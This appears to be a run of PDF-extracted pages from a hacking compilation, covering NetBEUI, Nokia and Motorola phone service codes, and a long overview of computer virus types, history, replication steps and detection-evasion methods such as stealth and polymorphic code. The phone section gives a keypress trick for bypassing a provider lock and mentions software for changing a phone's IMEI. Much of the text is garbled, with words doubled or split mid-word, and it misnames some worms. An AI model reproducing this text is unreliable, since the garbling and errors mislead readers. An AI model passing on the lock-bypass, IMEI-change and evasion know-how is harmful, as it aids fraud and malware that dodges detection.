NetBEUI Explained NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBE NetBEUI UI implement implementss the OSI LLC2 LLC2 protoc protocol. ol. NetBEU NetBEUII is the origin original al PC networkin networking g protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software software sends and receives messages over the NetBIOS NetBIOS frame protocol. protocol. This protocol runs over the standard 802.2 data-link da ta-link protocol layer. layer.
NetBIOS Scopes A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The Net NetBI BIOS OS scop scopee ID on two two host hostss must must matc match, h, or the the two two host hostss will will not not be able able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
Back 92
93
Mobile hacking Nokia 2110/I is codes shows you software version, software date and hardware mode l number of your phone.
On 2110, type: * # 9999 #
On 2110i, may function one of the followings: * # 170602112302 # or * # 682371158412125 #
Show IMEI code If you need to know what's the IMEI code of your phone, simply press:
* # 06 # you'll read it on display.
Change IMEI code If you want to change IMEI code of your phone (we don't want to know "why"), here is the software you'll need.
Show manufact. date To get the manufacturing date of your phone, press: * # 3283 # (= *#date#)
in 1995 phones, date is in "mmyy" format, 1996 and later phones show date in "wwyy" format.
Unlock SP lock Here is a way to Unlock your phone which is Service Provider locked, without to know 94
SPLock code !!!! Give it a try (and give us feedback, pls): Turn the phone on, when the phone asks for the Security Code, press:
112
now quickly press:
# send end send end.
Each time you turn your phone OFF it resets the lock, so this need to be done each time you'll turn your phone ON :-( Anyway it's better than nothing, isn't it?
Pin-Out
ANT 16 9 Charging connector (O) I-I-I-I-I-I-I-I I-I-I-I-I-I-I-I ( ) ( o ) CON 8 1
The left symbol (O) is the antenna connector connec tor for car kits. The symbol numbered 16-9 on the top and 8-1 on the bottom is the system connector. the ( ) is the open space next to the connector and the ( o ) is the charging connector conne ctor for you home-charger.
PIN Description 1 - Digital ground 95
2 - External audio input from accessories or handsfree microphone. Multiplexed with junction box connection control signal 3 - Analogue ground for accessories 4 - Transmitted DBUS data to the accessories 5 - Serial Bidirectional data between the phone and accessories 6 - Hook indication. HP has a 10 100KE 0KE pull-up resistor. 7 - Handsfree device power on/off, on /off, data to flash programming device. 8 - Battery charging voltage 9 - Digital ground 10 - External Audio output to accessories or handsfree speaker 11 - DBUS data bit sync clock 12 - DBUS recieved data from the accessories 13 - Power supply to headset adapter 14 - Programming voltage for FLASH 15 - DBUS data clock 16 - Battery charging voltage
Software Bug Software version prior ver. 5.48 may randomly reset and restart itself, it seems to be fixed in later version
For: Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 & 8700 IMEI *#06# displays IMEI on 8700, NOT on 6200, 7500, 8200
To activate RBS: (pause means the * key held in until box appears)
[pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok]
You now have to press the [MENU] and scroll to the 'Eng Field Options' function with the keys, and enable it.
96
To de-activate RBS, [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok] This only works with some versions of software. Please report what works and doesn't for you. Reported working, by country: d460: IT 6200 Flare: UK (Orange), AU 7500: IT (model: F16 HW: 5.2 SW: 2.1) 8200: ES, AU, NL, BE 8400: IT, NL 8700: AU, IT, IT, SG, DE, ES, ZA
Uses of RBS: Distance From Base Station - Place a call, when it is answered, press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'Time Adv xxx' appears, where xxx is a number. Multiply this number by 550, and the result is the distance from the RBS (Radio Base Station), in meters.
Signal Quality - press [MENU] until 'Eng Field Option' is displayed, press [OK], select 'Active Cell', press [OK], press [MENU] until 'C1' appears. This is the signal quality. If it becomes negative for longer than 5 seconds, a new cell is selected.
Back
97
98
Viruses
Index
•
Introduction to Computer Viruses
•
History
•
Why Do People Write Viruses
•
Virus Code
Back
99
100
Introduction to Computer Viruses The person might have a computer virus infection when the computer starts acting differently. For instance getting slow or when they turn the computer on, it says that all the data is erased or when they start writing a document, it looks different, some chapters might be missing or something else abnormal has happened. happe ned. The next thing usually the person whose computer might be infected with virus, panics. The person might think that all the work that has been done is missing. That could be true, but in most cases viruses have not done any harm jet, but when one start doing something and are not sure what you do, that might be harmful. When some people try to get rid of viruses they delete files or they might even format the whole hard disk like my cousin did. That is not the best way to act when the person think that he h e has a virus infection. What people do when they get sick? They go to see a doctor if they do not know what is wrong with them. It is the same way with viruses, if the person does not know what to do they call someone who knows more about viruses and they get professional help. If the person read email at their PC or if they use diskettes to transfer files between the computer at work and the computer at home, or if they just transfer files between the two computers they have a good possibility to get a virus. They might get viruses also when they download files from any internet site. There was a time when people were able to be sure that some sites we secure, that those secure sites did not have any virus problems, but nowadays the people can not be sure of anything. There has been viruses even in Microsoft's download sites. In this report I am going to introduce different malware types and how they spread out and how to deal with them. Most common viruses nowadays are macro viruses and I am going to spend a little more time with them. I am going to give an example of trojan horses stealing passwords. Comparison with biological viruses
How viruses work A computer virus will pass from one computer to another like a real life biological virus passes from person to person. For example, it is estimated by experts that the [Mydoom] worm infected a quarter-million computers in a single day in January 2004.Another example is the ILOVEYOU virus, which occurred in 2000 and had a similar effect. It stole most of its operating style from Melissa. There are tens of thousands of viruses out there, and new ones 101
are discovered every day. It is difficult to come up with a generic explanation of how viruses work, since they all have variations in the way they infect the way they spread. So instead, we’ve taken some broad categories ca tegories that are commonly used to describe various types of v irus.
Basic types of viruses File viruses (parasitic (parasitic viruses) viruses) File viruses are pieces of code that attach themselves to executable files, driver files or compressed compressed files, and are activated when the host program is run. After After activation, activation, the virus may spread itself by attaching itself to other programs in the system, and also carry out the malevolent activity it was programmed for. Most file viruses spread by loading themselves in system memory and looking for any other programs located on the drive. If it finds one, it modifies the program’s code so that it contains and activates the virus the next time it’s run. It keeps doing this over and over until it spreads across the system, and possibly to other systems systems that the infected program may be shared shared with. Besides spreading spreading themselves, themselves, these viruses also carry some type of destructive constituent that can be activated immediately or by a particular ‘trigger’. The trigger could be a specific date, or the number of times the virus has been replicated, or anything equally trivial. Some examples of file viruses are Randex, Meve and MrKlunky.
Boot sector viruses A boot sector virus affects the boot sector of a hard disk, which is a very crucial part. The boot sector is where all information about the drive is stored, along with a program that makes it possible for the operating system to boot up. By inserting its code into the boot sector, a virus guarantees that it loads into memory during every boot sequence. A boot virus does not affect files; instead, it affects the disks that contain them. Perhaps this is the reason for their downfall. During the days when programs were carried around on floppies, the boot sector viruses used to spread like wildfire. However, with the CD-ROM revolution, it became impossible to infect pre-written data on a CD, which eventually stopped such viruses from spreading. Though boot viruses still exist, they are rare compared to new-age malicious software. Another reason why they’re not so prevalent is that operating systems today protect the boot sector, which makes it difficult for them to thrive. Examples of boot viruses are Polyboot.B and AntiEXE.
102
Multipartite Multipartit e viruses Multipartite Multipartite viruses are a combination of boot sector viruses and file viruses. These viruses come in through infected media and reside in memory. They then move on to the boot sector of the hard drive. From there, the virus infects executable files on the hard drive and spreads across the system. There aren’t too many multipartite viruses in existence today, but in their heyday, they accounted for some major problems due to their capacity to combine different infection techniques. A significantly famous multipartite virus is Ywinz. Macro Viruses iruses hat contain contain macros macros.. These These includ includee Micros Microsoft oft Offic Officee documen documents ts such such as Word documen documents, ts, Excel Excel spread spreadshee sheets, ts, PowerP PowerPoin ointt presen presentat tation ions, s, Access Access databas databases, es, and other other similar application files such as Corel Draw, AmiPro, etc. Since macro viruses are written in the language of the application, and not in that of the operating system, they are known to be platform-independent—they can spread between Windows, Mac, and any other system, so long as they’re running the required application. With the ever-increasing capabilities of macro languages in applications, and the possibility of infections spreading over net-works, these viruses are major threats. The first macro virus was written for Microsoft Word and was discovered back in August 1995. Today, there are thousands of macro viruses in existence— some examples are Relax, Melissa.A and Bablas.
Network viruses viruses This kind of virus is proficient in quickly spreading across a Local Area Network (LAN) or even over the Internet. Usually, it propagates through shared resources, such as shared drives and folders. Once it infects a new system, it searches for potential targets by searching the network for other vulnerable systems. Once a new vulnerable system is found, the network virus infects the other system, and thus spreads over the network. Some of the most notorious network viruses are Nimda and SQLSlammer. E-mail Viruses An e-mail virus could be a form of a macro virus that spreads itself to all the contacts located in the host’s email address book. If any of the e-mail recipients open the attachment of the infected mail, It spreads to the new host’s address book contacts, and then proceeds to send itself to all those contacts as well. These days, e-mail viruses can infect hosts even if the infected e-mail is previewed in a mail client. There are many ways in which a virus can infect or stay dormant on your PC. However, whether active or dormant, it’s dangerous to let one loose on your system, and should be dealt with immediately.
103
Other malicious software ]Earlier, the only way a computer was at risk was when you inserted an infected floppy. With the new age of technology, every computer is interconnected to the rest of the world at some point or the other, so it’s difficult to pinpoint the source and/or time of the infection. As if that weren’t bad enough, new-age computing has also brought about a new breed of malicious software. Today, the term ‘virus’ has become a generic term used for all the different ways that your computer can be attacked by malicious software. Besides the type of viruses we mentioned here’s a look at some of the newer problems we face today.
Trojan horses horse s The biggest difference between a Trojan horse—or Trojan—and a virus is that Trojans don’t spread themselves. themselves. Trojan Trojan horses horses disguise disguise themselves as useful software software available available for down-load on the Internet, and naïve users download and run them only to realise their mistake later. A Trojan horse is usually divided into two parts—a server and a client. It’s the client that is cunningly disguised as important soft-ware and placed in peer-to-peer file sharing networks, or unofficial download sites. Once the client runs on your system, the attacker—the person running the server—has a high level of control over your system, which can lead to devastating effects depending on the attacker’s intentions. Trojan horses have evolved to a tremendous level of sophistication, which makes each one significantly different from the other. We We have categorized c ategorized them roughly into the following:
Remote access Trojans These are the most commonly available Trojans. These give an attacker complete control over the victim’s computers. The attacker can go through the files and access any personal information about the user that may be stored in the files, such as credit card numbers, passwords, and important financial documents.
Password-Sending Trojans The purpose of such Trojans is to copy all cached passwords and look for other passwords as you enter them, and send them to specific mail address, without the user’s knowledge. Passwords for restricted Web sites, messaging services, FTP services and e-mail services come under direct threat with this kind of Trojan. 104
Keyloggers Keyloggers These log victims’ keystrokes keystrokes and then send the Logs to the attacker. attacker. The attacker then searches for passwords or other sensitive data in the log files. Most of them come with two functions, such as online and offline recording. Of course, they can be configured to send the log file to a specific-mail address on a daily basis
Destructive Thee only Th only func functi tion on of thes thesee Troja rojans ns is to dest destro roy y and and dele delete te file files. s. Th They ey can can autom automat atic ical ally ly dele delete te all all the the core core syst system em file filess on your your mach machin ine. e. The Troja rojan n coul could d be Controlled by the attacker or could be programmed to strike like logic bomb-starting on a specific day or at specific hour. The main idea behind Denial of Service (DoS) Attack Trojans is to generate a lot of internet traffic on the victim’s machine, to the extent that the Internet connection is too overloaded to let the user visit a website or download anything. Another variation of a DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machin machines es as possib possible le and simult simultaneo aneousl usly y attack attack specif specific ic e-mail e-mail address addresses es with with random random subjects and contents that cannot be filtered. Proxy/Wingate Trojans These types of Trojan turn the victim’s computer into a proxy/wingate server. That way, the infected computer is available to the whole world to be used for anonymous access to various risky Internet services. The attacker can register domains or access pornographic Web sites with stolen credit cards or do similar illegal activities without being traced. FTP Trojans Trojans These trojans are probably the most simple, and are outdated. The only thing they do is open port 21—the port for FTP transfers—and let everyone connect to your machine. Newer versions are password protected, so only the attacker can connect to your computer. Software Detection Killers These trojans kill popular antivirus/firewall programs that protect your machine to give the attacker access to the victim’s machine. A trojan could have any one or a combination of the above mentioned functionalities. Worms Computer Worms are programs that reproduce and run independently, and travel across network connections. The main difference between viruses and worms is the method in which they reproduce and spread. A virus is dependent upon a host file or boot sector, and the transfer of files between machines to spread, while a worm can run completely independently and spread of its own accord through network connections. The security threat of worms is equivalent to that of a virus. Worms are capable of doing a whole range of damage such as destroying essential files in your system, slowing it 105
down to a great extent, or even causing some essential programs to crash. Two famous examples of worms are the MS-Blaster and Sesser worms.
Spyware Spywa Spyware re is the the newnew-ag agee term term for for adver adverti tisi singng-su suppo pport rted ed soft softwa ware re (Adw (Adwar are) e).. Advertising in shareware products is a way for shareware authors to make money, other than by selling it to the user. There are several large media companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. If the user finds the banners annoying, there is usually an option to get rid of them by paying the licensing fee. Unfortunately, the advertising companies often also install additional tracking software on your system, which is continuously using your Internet connection to send statistical data back to the advertisers. While the privacy policies of the co mpanies claim there will be no sensitive or identifying data collected from your system and that you shall remain anonymous, the fact remains that you have a server sitting on your PC that is sending information about you and your surfing habits to a remote location, using your bandwidth. Spywar Spywaree has been been kno known wn to slow slow down down compute computers rs with with their their semisemi-int intens ensive ive usage usage of processing power, bringing up annoying pop-up windows at the most inappropriate times and changing your Internet browsing settings such as your home page or default search engine to their own services. Even if many do not consider this illegal, it is still is a major security threat, and the fact that there’s no way to get rid of them ma kes them as much of a nuisance as viruses. Logic Bombs A logic bomb is a program which has deliberately been written or modi modifi fied ed to prod produc ucee resu result ltss when when cert certai ain n condi conditi tion onss are are met met that that are are unex unexpec pecte ted d and unauthorized by legitimate users or owners of the software. Logic bombs may reside within standalone programs, or they may be part of worms or viruses. A variation of the logic bomb is the time bomb that ‘explodes’ at a certain time. An example of a time bomb is the infamous ‘Friday the 13th’ virus.
Classification Viruses can be subdivided into a number of types, the main ones being: •
Boot sector viruses
•
Companion viruses
•
Email viruses
•
Logic bombs and time bombs 106
•
Macro viruses
•
Cross-site sc scripting vi virus
Two other other types types of malware malware are often often classi classifie fied d as viruse viruses, s, but are actuall actually y forms forms of distributing malware: •
Trojan horses
•
Worms
Boot sector virus A boot sector virus alters or hides in the boot sector, usually the 1st sector, of a bootable disk or hard drive. Boot sector viruses were prevalent in the 1980s.
Companion Companion virus A comp compani anion on viru viruss does does not have have host host file filess per per se, se, but but expl exploi oits ts MS-D MS-DOS OS.. A companion virus creates new files (typically .COM but can also use other extensions such as ".EXD") that have the same file names as legitimate .EXE files. When a user types in the name of a desired program, if a user does not type in ".EXE" but instead does not specify a file extension, DOS will assume he meant the file with the extension that comes first in alphabetical order and run the virus. For instance, if a user had "(filename).COM" (the virus) and "(filename).EXE" and the user typed "filename", he will run "(filename).COM" and run the virus. The virus will spread and do other tasks before redirecting to the legitimate file, which operates normally. Some companion viruses are known to run under Windows 95 and on DOS emulators on Windows NT systems. Path companion viruses create files that have the same name as the legitimate file and place new virus copies earlier in the directory paths. These viruses have become increasingly rare with the introduction of Windows XP,which does not use the MS-DOS command prompt.
E-mail virus An E-mail virus is a virus which uses e-mail e-mail messages as a mode of transport. transport. These viruses viruses often copy themselves themselves by automatically automatically mailing copies to hundreds hundreds of people in the victim's address book.
107
Logic bomb A logic bomb employs code that lies inert until specific conditions are met. The resolution of the conditions will trigger a certain function (such as printing a message to the user and/or deleting files). An example of a logic bomb would be a virus that waits to execute until it has infected a certain number of hosts. A time bomb is a subset of logic bomb, which is set to trigger on a particular date and/or time.
Macro virus A macro virus, often written in the scripting languages langu ages for Microsoft programs such as Word and Excel, Ex cel, is spread in Microsoft Office by infecting documents and spreadsheets.
Cross-site scripting virus A cross-site scripting virus (XSSV) is a type of virus that utilizes cross-site scripting vulnerabilities to replicate. A XSSV is spread between vulnerable web applications and web browsers creating a symbiotic relationship.
Trojan horse Trojan Horses are impostor files that claim to be something desirable but, in fact, are malicious. malicious. Rather than insert code into existing existing files, a Trojan Trojan horse appears to do one thing (install a screen saver, or show a picture inside an e-mail for example) when in fact it does something entirely different, and potentially malicious, such as erase files. Trojans can also open back doors so that computer hackers can gain access to passwords, and other personal information stored on a computer. computer. Although often referred to as such, Trojan horses are not viruses in the strict sense because they cannot replicate automatically. For a Trojan horse to spread, it must be invited onto a computer computer by the user opening an email attachment attachment or downloading downloading and running running a file from the Internet, for example.
Worm A worm is a piece of software that uses computer networks and security flaws to create copies of itself. A copy of the worm will scan the network for any other machine that has a specific security flaw. flaw. It replicates itself to the new machine using the security flaw, and then begins scanning and replicating a new.
108
Worms are programs that replicate themselves from system to system without the use of a host file. This is in contrast to viruses, which requires the spreading of an infected host file. Although worms generally exist inside of other files, often Word or Excel documents, there is a difference between how worms and viruses use the host file. Usually the worm will release a document that already has the "worm" macro inside the document. The entire docum document ent will will trav travel el from from compu compute terr to comp comput uter er,, so the the enti entire re docum documen entt shou should ld be considered the worm. Mudroom or ILOVEYOU are two examples of worms.
Effects of computer viruses Some viruses viruses are progra programme mmed d to damage damage the comput computer er by damagin damaging g progra programs, ms, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and make their presence known by presenting text, video, or audio messages. messages. Even these benign viruses can create problems problems for the computer user. user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are bug-ridden, and these bugs may lead to system crashes and data loss.
Use of the word "virus" The word viru viruss is deri derive ved d from from and and used used in the the same same sens sensee as the the biol biolog ogic ical al equivalent. The term "virus" is often used in common parlance to describe all kinds of malware (malicious software), including those that are more properly classified as worms or Trojans. Most popular anti-virus software packages defend against all of these types of attack. In some technical communities, the term "virus" is also extended to include the authors of malware, in an insulting sense. The English plural of "virus" is "viruses". Some people use "virii" or "viri" as a plural, but this is rare. For a discussion about whether "viri" and "virii" are correct alternatives of "viruses", see plural of virus. The term "VIRUS" was first used in an academic publication by Fred Cohen in his 1984 paper Experiments with Computer Viruses, where he credits Len Adleman with coining it. However, a 1972 science fiction novel by David Gerrold, When H.A.R.L.I.E. Was One, includes a description of a fictional computer program called "VIRUS" that worked just like a virus (and was countered by a program called "VACCINE"). The term "computer virus" with current usage also appears in the comic book Uncanny X-Men #158, written by Chris Claremont and published in 1982. Therefore, although Cohen's use of "virus" may, perhaps, have been the first "academic" use, the term had been used earlier.
Back 109
110
111
History A program called "Elk Cloner" is credited with being the first computer virus to appear "in the wild" -- that is, outside the single computer or lab where it was created. Written Written in 1982 by Rich Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread by floppy disk. This virus was originally a joke, created by the high school student and put onto a game. The game was set to play, play, but release the virus on the 50th time of starting the game. Only this time, instead of playing the game, it would change to a blank screen that read a poem about the virus named Elk Cloner. The computer would then be infected. The first PC virus was a boot sector virus called (c)Brain, created in 1986 by two brothers, Basit and Amjad Farooq Alvi, operating out of Lahore, Pakistan. The brothers reportedly created the virus to deter pirated copies of software they had written. However, analysts have claimed that the Ashar virus, a variant of Brain, possibly predated it based on code within the virus. Before computer networks became widespread, most viruses spread on removable media, particularly floppy disks. In the early days of the personal computer, many users regularly exchanged information and programs on floppies. Some viruses spread by infecting programs stored on these disks, while others installed themselves into the disk boot sector, ensuring that they would be run when the user booted the computer from the disk. Tradi Traditio tional nal comput computer er viruse virusess emerg emerged ed in the 198 1980s, 0s, driven driven by the spread spread of person personal al computers and the resultant increase in BBS and modem use, and software sharing. Bulletin board driven software sharing contributed directly to the spread of Trojan horse programs, and viruses were written to infect popularly traded software. Shareware and bootleg software were equally common vectors for viruses on BBS's. Within the "pirate scene" of hobbyists trad tradin ing g illi illici citt copi copies es of comme commerc rcia iall soft softwa ware re,, trad trader erss in a hurry hurry to obtai obtain n the the late latest st applications and games were easy targets for viruses. Since the mid-1990s, macro viruses have become common. Most of these viruses are written in the scripting languages for Microsoft programs such as Word and Excel. These viruses spread in Microsoft Office by infecting documents and spreadsheets. Since Word and Excel Ex cel were also also avai availa labl blee for for Mac Mac OS, OS, most most of thes thesee viru viruse sess were were able able to spre spread ad on Macintosh computers as well. Most of these viruses did not have the ability to send infected e-mail. Those viruses which did spread through e-mail took advantage of the Microsoft Outlook COM interface. 112
Macro Macro viruse virusess pose pose unique unique problem problemss for detecti detection on softwa software. re. For exampl example, e, some some versions of Microsoft Word allowed macros to replicate themselves with additional blank lines. The virus behaved identically but would be misidentified as a new virus. In another example, if two macro viruses simultaneously infect a document, the combination of the two, if also self-replicating, can appear as a "mating" of the two and would likely be detected as a virus unique from the "parents". A computer virus may also be transmitted through instant messaging. A virus may send a web address link as an instant message to all the contacts on an infected machine. If the recipient, thinking the link is from a friend (a trusted source) and follows the link to the website, the virus hosted at the site may be able to infect this new computer and continue propagating. The newest species of the virus family is the cross-site scripting virus. The virus emerged from research and was academically demonstrated in 2005. This virus utilizes crosssite scripting vulnerabilities to propagate. Since 2005 there have been multiple instances of the cross-site scripting viruses in the wild, most notable sites affected have been MySpace and Yahoo.
Back
113
114
Why do people write and spread viruses? It is difficult to know why people write them. Everyone has their own reasons. Some general reasons are to experiment how to write viruses or to test their programming talent. Some people just like to see how the virus spreads and gets famous around the World. The following is a list from news group postings alt.comp.virus and tries to explain why people write and spread viruses.
• •
They don't understand or prefer not to think about the consequences for other people
• •
They simply don't care
• •
They don't consider it to be their problem if someone else is inconvenienced
• •
They draw a false distinction between creating/publishing viruses and distributing them
• •
They consider it to be the responsibility of someone else to protect systems from their creations
• •
They get a buzz, acknowledged or otherwise, from vandalism
• •
They consider they're fighting authority
• •
They like 'matching wits' with anti virus vendors
• •
It's a way of getting attention, getting recognition from their peers and their names (or at least that of their virus) in the papers and the Wild List
• •
They're keeping the anti virus vendors in a job
• •
Replication strategies
• •
In order to replicate itself, a virus must be permitted to execute code and write to memory. For this reason, many viruses attach themselves to executable files that may be part of legitimate programs. If a user tries to start an infected program, the virus' code may be executed first. Viruses can be divided into two types, on the basis of their behavior when they are executed. Nonresident viruses immediately search for other hosts that can be infected, infect these targets, and finally transfer control to the application program they infected. Resident viruses do not search for hosts when they are starte started. d. Instea Instead, d, a reside resident nt virus virus loads loads itself itself into memory memory on executi execution on and transfers control to the host program. The virus stays active in the background and infects new hosts when those files are accessed by other programs or the operating system itself. 115
Nonresident viruses Non Nonre resi side dent nt viru viruse sess can be thou thought ght of as cons consis isti ting ng of a finde finderr modul modulee and and a replication module. The finder module is responsible for finding new files to infect. For each new executable file the finder module encounters, it calls the replication module to infect that file. For simple viruses the replicator's tasks are to: 11..
Open the new file
2.
Chec Check k if the the exe execu cuta tabl blee file file has has alr alrea eady dy bee been n infe infect cted ed (if (if it it is, is, retu return rn to to the the finder module)
3.
Appen ppend d the the vir virus code code to the the exec execut utab able le file file
4.
Save th the ex execut cutabl able's e's starting point
5.
Chan Change ge the the exe execu cuta tabl ble' e'ss star starti ting ng poi point nt so so that that it it poin points ts to to the the star startt loca locati tion on of of the newly copied virus code
6.
Save Save the the old old sta start rt loc locat atio ion n to the the vir virus us in in a way so tha thatt the the viru viruss bran branch ches es to to that location right after its execution.
7.
Save th the ch change nges to to th the ex executab utablle fi file
88..
Close the infected file
9.
Retu Return rn to to the the finde finderr so so that that it it can can find find new new fil files es for for the the repl replic icat ator or to to infe infect ct.. Resident viruses
Reside Resident nt viruse virusess contai contain n a replic replicati ation on module module that is simila similarr to the one that that is employed by nonresident viruses. However, this module is not called by a finder module. Instead, the virus loads the replication module into memory when it is executed and ensures that this module is executed each time the operating system is called to perform a certain operation. For example, the replication module can be called each time the operating system executes a file. In this case, the virus infects every suitable program that is executed on the computer. Resident viruses are sometimes subdivided into a category of fast infectors and a category of slow infectors. Fast infectors are designed to infect as many files as possible. For instance, a fast infector can infect every potential host file that is accessed. This poses a special problem to anti-virus software, since a virus scanner will access every potential host file on a computer when it performs a system-wide scan. If the virus scanner fails to notice that such a virus is present in memory, the virus can "piggy-back" on the virus scanner and in this way infect all files that are scanned. Fast infectors rely on their fast infection rate to 116
spread. The disadvantage of this method is that infecting many files may make detection dete ction more likely, because the virus may slow down a computer or perform many suspicious actions that can be noticed by anti-virus software. Slow infectors, on the other hand, are designed to infect hosts infrequently. For instance, some slow infectors only infect files when they are copied. Slow infectors are designed to avoid detection by limiting their actions: they are less likely to slow down a computer noticeably, and will at most infrequently trigger anti-virus software that detects suspicious behavior by programs. The slow infector approach does not seem very successful however.
Host types Viruses Viruses have targeted various types of hosts. This is a non-exhaustive list: • Binary executable files (such as COM files and EXE files in MS-DOS, Portable Executable files in Microsoft Windows, and ELF files in Linux) • Volume Volume Boot Records of floppy disks and hard disk partitions • The master boot record (MBR) of a hard disk • Gene Genera rall-pur purpos posee scri script pt file filess (such (such as batch batch file filess in MS-D MS-DOS OS and and Micr Micros osof oftt Windows, VBScript files, and shell script files on Unix-like platforms). • Application-specific script files (such as Telix-scripts) • Documents that can contain macros (such as Microsoft Word documents, Microsoft Excel spreadsheets, AmiPro documents, and Microsoft Access database files)
Methods to avoid detection In order to avoid detection by users, some viruses employ different kinds of dece ption. Some old viruses, especially on the MS-DOS platform, make sure that the "last modified" date of a host file stays the same when the file is infected by the virus. This approach does not fool anti-virus software, however howev er.. Some viruses can infect files without increasing their sizes or da maging the files. They accomplish this by overwriting unused areas of executable files. These are called cavity viruses. For example the CIH virus, or Chernobyl Virus, infects Portable Executable files. Because those files had many empty gaps, the virus, which was 1 KB in length, did not add to the size of the file. Some viruses try to avoid detection by killing the tasks associated with antivirus software before it can detect them. 117
As comput computers ers and operat operating ing system systemss grow grow larger larger and more more complex complex,, old hiding hiding techniques need to be updated or replaced.
Avoiding bait files and other undesirable hosts A virus needs to infect hosts in order to spread further. In some cases, it might be a bad idea to infect a host program. For example, many anti-virus programs perform an integr integrity ity check of their their own code. code. Infect Infecting ing such such progra programs ms will will theref therefore ore increas increasee the likelihood that the virus is detected. For this reason, some viruses are programmed not to infect programs that are known to be part of anti-virus software. Another type of hosts that viruses sometimes avoid is bait files. Bait files (or goat files) are files that are specially created by anti-virus software, or by anti-virus professionals themselves, to be infected by a virus. These files can be created for various reasons, all of which are related to the detection of the virus: • Anti-virus professionals can use bait files to take a sample of a virus (i.e. a copy of a program file that is infected by the virus). It is more practical to store and exchange a small, infected bait file, than to exchange a large application program that has been infected by the virus. • Anti-virus professionals can use bait files to study the behavior of a virus and evaluate evaluate detection detection methods. This is especially useful useful when the virus is polymorphic polymorphic.. In this case, the virus can be made to infect a large number of bait files. The infected files can be used to test whether a virus scanner detects all versions of the virus. v irus. • Some anti-virus software employs bait files that are accessed regularly. When these files are modified, the anti-virus software warns the u ser that a virus is probably active on the system. Since bait files are used to detect the virus, or to make detection possible, a virus can benefit benefit from not infecting infecting them. Viruses iruses typically typically do this by avoiding avoiding suspicious suspicious programs, such as small program files or programs that contain certain pa tterns of 'garbage instructions'. A related strategy to make baiting difficult is sparse infection. Sometimes, sparse infectors do not infect a host file that would be a suitable candidate for infection in other circumstances. For example, a virus can decide on a random basis whether to infect a file or not, or a virus can only infect host files on particular days of the week.
Stealth Stealth 118
Some viruses viruses try to trick trick anti-v anti-viru iruss softwa software re by interc intercept epting ing its requests requests to the operating system. A virus can hide itself by intercepting the anti-virus software’s request to read the file and passing the request to the virus, instead of the OS. The virus can then return an uninfected version of the file to the anti-virus software, so that it seems that the file is "cle "clean an". ". Mo Mode dern rn antianti-vi viru russ soft softwa ware re empl employs oys vari various ous tech techni niqu ques es to count counter er steal stealth th mechanisms of viruses. The only completely reliable method to avoid stealth is to boot from a medium that is known to be clean.
Self-modification Self-modification Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for so-called virus signatures. A signature is a characteristic byte-pattern that is part of a certain certain virus or family family of viruses. viruses. If a virus scanner scanner finds such a pattern pattern in a file, it notifies notifies the user that the file is infected. infected. The user can then delete, or (in some cases) "clean" or "heal" the infected file. Some viruses employ techniques that make detection by means of signatures difficult or impossible. These viruses modify their code on each infection. That is, each infected file contains a different variant of the virus.
Simple self-modifications In the past, some viruses modified themselves only in simple ways. For example, they regularly exchanged subroutines in their code for others that would perform the same action for example, 2+2 could be swapped for 1+3. This poses no problems to a somewhat advanced virus scanner. Encryption with a variable key A more advanced method is the use of simple encryption to encipher the virus. In this case, the virus consists of a small decrypting module and an encrypted copy of the virus code. If the virus is encrypted with a different key for each infected file, the only part of the virus that remains constant is the decrypting module, which would (for example) be appended to the end. In this case, a virus scanner cannot directly detect the virus using signatures, but it can still detect the decrypting module, which still makes indirect detection of the virus possible. Mostly, the decryption techniques that these viruses employ are simple and mostly done by just XORing each byte with a randomized key that was saved by the parent virus. The use of XOR-operations XOR-operations has the additional additional advantage advantage that the encryption encryption and decryption routine are the same (a XOR b = c, c XOR b = a.) 119
Polymorphic code Polymorphic code was the first technique that posed a serious threat to virus scanners. Just like regular encrypted viruses, a polymorphic virus infects files with an encrypted copy of itself, which is decoded by a decryption module. In the case of polymorphic viruses howe however ver,, this this decry decrypt ptio ion n modul modulee is also also modi modifi fied ed on each each infe infect ctio ion. n. A well well-w -wri ritt tten en polymorphic virus therefore has no parts that stay the same on each infection, making it impossible to detect directly using signatures. Anti-virus software can detect it by decrypting the viruses using an emulator, or by statistical pattern analysis of the encrypted virus body. To To enable polymorphic code, the virus has to have a polymorphic engine (also called mutating engine or mutation engine) somewhere in its encrypted body. See Polymorphic code for technical detail on how such engines operate. Some viruses employ polymorphic code in a way that constrains the mutation rate of the virus significantly. For example, a virus can be programmed to mutate only slightly over time, or it can be programmed to refrain from mutating when it infects a file on a computer that already contains copies of the virus. The advantage of using such slow polymorphic code is that it makes it more difficult for anti-virus professionals to obtain representative samples of the virus, because bait files that are infected in one run will typically contain identical or similar samples of the virus. This will make it more likely that the detection by the virus scanner will be unreliable, and that some instances of the virus may be able to avoid detection.
Metamorphic code To avoid being detected by emulation, some viruses rewrite themselves completely each time they are to infect new executables. Viruses that use this technique are said to be metamorphic. To enable metamorphism, a metamorphic engine is needed. A metamorphic virus is usually very large and complex. For example, W32/Simile consisted of over 14000 lines of Assembly Assembly language code, 90% 90 % of it part of the metamorphic engine.
Conclusions There are lots of viruses in the world and new viruses are coming up every day. There are new anti-virus programs and techniques developed too. It is good to be aware of viruses
120
